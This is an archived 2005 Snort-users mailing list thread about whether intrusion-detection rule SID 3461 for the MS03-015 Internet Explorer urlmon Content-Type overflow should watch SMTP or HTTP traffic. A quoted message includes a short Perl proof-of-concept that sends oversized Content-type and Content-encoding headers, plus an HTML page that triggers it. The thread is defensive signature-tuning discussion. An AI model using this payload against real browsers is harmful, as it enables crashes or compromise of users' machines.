[Snort-users] Re: SMTP Content - Type overflow attempt SID 3461

hchlai at ...2792... hchlai at ...2792...
Tue Oct 25 12:48:42 EDT 2005


Why should we concern about a vulnerable machine that is located on the "$EXTERNAL_NET"?? Shouldn't this signature be written the other way around and detect $SMTP_SERVERS 25 -> $EXTERNAL_NET any instead? 
 
HinSuk
 

-----Original Message-----
From: Alex Kirk <alex.kirk at ...1935...>
To: Craig Mueller <cmueller at ...11019...>
Cc: snort-users at lists.sourceforge.net
Sent: Mon, 26 Sep 2005 12:37:54 -0400
Subject: Re: [Snort-users] SMTP Content-Type overflow attempt SID 3461


The rule looks for traffic on port 25 because it's possible to exploit this vulnerability via an HTML e-mail message (since Outlook uses IE to do HTML rendering). Rules for web-based attacks exist in the Community rules as SIDs 100000118 and 100000119. 
 
Alex Kirk 
Research Analyst 
Sourcefire, Inc. 
 
> I've seen the following alert triggered 
> 
> [**] [1:3461:2] SMTP Content-Type overflow attempt [**] 
> [Classification: Attempted Administrator Privilege Gain] [Priority: 1] > 09/25-11:11:06.816693 x.y.z.1:35499 -> 192.168.1.10:25 
> TCP TTL:240 TOS:0x10 ID:0 IpLen:20 DgmLen:2776 
> ***AP*** Seq: 0xCE9CF6A4 Ack: 0xDEEA2DBD Win: 0x40B0 TcpLen: 20 
> [Xref => > http://www.microsoft.com/technet/security/bulletin/MS03-015.mspx][Xref > => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2003-0113][Xref => > http://www.securityfocus.com/bid/7419] 
> 
> Yet the Microsoft fix is for Internet Explorer, yet the signature > looks for traffic on port TCP / 25. I think the signature should look > for this exploit on TCP port 80 
> 
> Attached is the sample exploit, which would also only effect port 80.. 
> !/usr/bin/perl 
> # 
> # Name this file as "urlmon-bo.cgi" 
> # 
> $LONG="A"x300; 
> print "Content-type: $LONG\r\n"; 
> print "Content-encoding: $LONG\r\n"; 
> print "\r\n"; 
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8- - 
> <html> 
> <body> 
> <img src="urlmon-bo.cgi"> 
> </body> 
> </html> 
> 
> 
 
 
------------------------------------------------------- 
SF.Net email is sponsored by: 
Tame your development challenges with Apache's Geronimo App Server. Download 
it for free - -and be entered to win a 42" plasma tv or your very own 
Sony(tm)PSP. Click here to play: http://sourceforge.net/geronimo.php 
_______________________________________________ 
Snort-users mailing list 
Snort-users at lists.sourceforge.net 
Go to this URL to change user options or unsubscribe: 
https://lists.sourceforge.net/lists/listinfo/snort-users 
Snort-users list archive: 
http://www.geocrawler.com/redir-sf.php3?list=snort-users 
__________________________________________________________________
Look What The New Netscape.com Can Do!
Now you can preview dozens of stories and have the ones you select delivered to you without ever leaving the Top Home Page. And the new Tool Box gives you one click access to local Movie times, Maps, White Pages and more.  See for yourself at http://netcenter.netscape.com/netcenter/
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.snort.org/pipermail/snort-users/attachments/20051025/a065b9ae/attachment.html>


More information about the Snort-users mailing list